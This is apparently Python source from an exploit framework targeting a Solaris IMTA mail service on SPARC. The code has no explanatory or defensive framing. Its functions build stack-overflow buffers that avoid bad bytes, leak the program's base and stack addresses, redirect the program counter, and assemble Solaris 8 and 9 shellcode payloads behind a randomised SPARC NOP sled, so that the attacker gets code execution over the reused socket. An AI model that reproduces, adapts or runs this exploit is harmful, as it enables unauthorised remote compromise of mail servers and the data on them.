def validReply(self, target, reply, stackBase): got = utils.stringifyAddr(target.got[0]) for i in target.got[1:]: got += utils.stringifyAddr(target.imtaBase + i) validResponse = got[0:13] + "\r\n" if (validResponse == reply): return True return False
def buildBounceBuffer(self): imtaBase = self.imtaBase baseBuf = self.buildBaseBuffer(imtaBase) l7 = (imtaBase + self.l7Imta) + self.l7Offset fp = imtaBase + self.fp filler = utils.buildBuffer(0x18, self.badBytes) bounceBuf = baseBuf \ + utils.stringifyAddr(l7) \ + filler \ + utils.stringifyAddr(fp) \ + utils.stringifyAddr(self.pc - 8) return bounceBuf
def buildImtaLeakBuffers(self, imtaBase): baseBuf = self.buildBaseBuffer(imtaBase) l7 = (imtaBase + self.l7Imta) + self.l7Offset filler = utils.buildBuffer(4, self.badBytes) leakBuf = baseBuf \ + utils.stringifyAddr(l7) \ + filler # filler is necessary in case we # get 0x20 as the last byte in l7 response = imtaBase + self.l7ImtaResponse matchBuf = utils.stringifyAddr(response) \ + utils.stringifyAddr(0) \ + "01234\r\n" return leakBuf, matchBuf
def buildBaseBuffer(self, imtaBase): filler = utils.buildBuffer(self.baseBufLen, self.badBytes) conn = self.conn found = False while ((not found) and (conn < len(self.addrs))): addr = imtaBase + self.addrs[conn] conn += 1 if (not utils.intHasBadBytes(addr, self.badBytes)): found = True self.conn = conn if (not found): raise IndexError() baseBuf = filler[0x0:0x104] \ + utils.stringifyAddr(addr) \ + filler[0x108:0x120] \ + utils.stringifyAddr(addr) \ + utils.stringifyAddr(addr) \ + utils.stringifyAddr(addr) \ + filler[0x12c:0x134] \ + utils.stringifyAddr(addr) \ + utils.stringifyAddr(addr) \ + utils.stringifyAddr(addr) \ + filler[0x140:0x17c] \ + utils.stringifyAddr(addr) \ + filler[0x180:] return baseBuf
def buildShellcodeBuffer(self, target, challenge): stackBase = target.stackBase basePC = stackBase + target.bigBufOffset pc = basePC while (utils.intHasBadBytes(pc - 8, target.badBytes)): pc += 4 socketLoc = stackBase + target.socketOffset solaris9shellcode.socket_offset = \ utils.stringifyAddr(socketLoc - (pc + 8)) solaris9shellcode.challenge = \ utils.stringifyAddr(challenge); filler = utils.buildBuffer(pc - basePC, target.badBytes) shellcodeBuf = filler \ + solaris9shellcode.build() target.pc = pc return shellcodeBuf
def buildStackLeakBuffer(self, target, stackBase): baseBuf = target.buildBaseBuffer(target.imtaBase) l7 = (stackBase + self.l7Stack) + target.l7Offset filler = utils.buildBuffer(4, target.badBytes) leakBuf = baseBuf \ + utils.stringifyAddr(l7) \ + filler # filler is necessary in case we # get 0x20 as the last byte in l7 return leakBuf
def buildShellcodeBuffer(self, target): stackBase = target.stackBase basePC = stackBase + target.bigBufOffset pc = basePC while (utils.intHasBadBytes(pc - 8, target.badBytes)): pc += 4 solaris8shellcode.stackbase = \ utils.stringifyAddr(stackBase + self.l7Stack) solaris8shellcode.socket_offset = \ utils.stringifyAddr(target.socketOffset) badRegs = range(0, 8) + [14, 30, 31] # global regs, sp, fp, and i7 shellcode = solaris8shellcode.build() sledLen = (target.bigBufLen - len(shellcode)) / 4 sled = '' for i in range(0, sledLen): nop = utils.randomSparcNOP(badRegs, target.badBytes) sled += utils.stringifyAddr(nop) shellcodeBuf = sled \ + shellcode target.pc = pc return shellcodeBuf